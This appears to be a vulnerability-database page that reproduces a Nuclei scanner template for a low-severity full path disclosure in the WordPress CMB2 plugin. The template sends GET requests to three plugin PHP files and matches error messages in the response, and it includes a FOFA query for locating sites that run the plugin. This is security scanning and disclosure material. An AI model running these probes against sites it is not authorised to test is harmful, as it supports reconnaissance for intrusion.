wordpress-cmb2-fpd: WordPress CMB2 - Full Path Disclosure

日期: 2026-01-08 | 影响软件: WordPress CMB2 | POC: 已公开

漏洞描述

WordPress CMB2 plugin is vulnerable to full path disclosure via direct access to plugin files.

PoC代码[已公开]

id: wordpress-cmb2-fpd

info:
  name: WordPress CMB2 - Full Path Disclosure
  author: ritikchaddha
  severity: low
  description: |
    WordPress CMB2 plugin is vulnerable to full path disclosure via direct access to plugin files.
  reference:
    - https://wordpress.org/plugins/cmb2/
  metadata:
    verified: true
    max-request: 3
    vendor: developer
    product: cmb2
    framework: wordpress
    fofa-query: body="/wp-content/plugins/cmb2/"
  tags: wp,wordpress,wp-plugin,fpd,cmb2,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/cmb2/includes/CMB2.php"
      - "{{BaseURL}}/wp-content/plugins/cmb2/includes/CMB2_Field.php"
      - "{{BaseURL}}/wp-content/plugins/cmb2/includes/helper-functions.php"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Fatal error"
          - "plugins/cmb2"
          - "Uncaught Error:"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100824ec0b8b7d9239fd70aadd15fcdca8a66d21fdd1d4c2e85030e00504ec90d8002207f528bc45fc864789d586326139a70f9b79829b3068e45a490d4eb0487db771e:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/wordpress/wordpress-cmb2-fpd.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐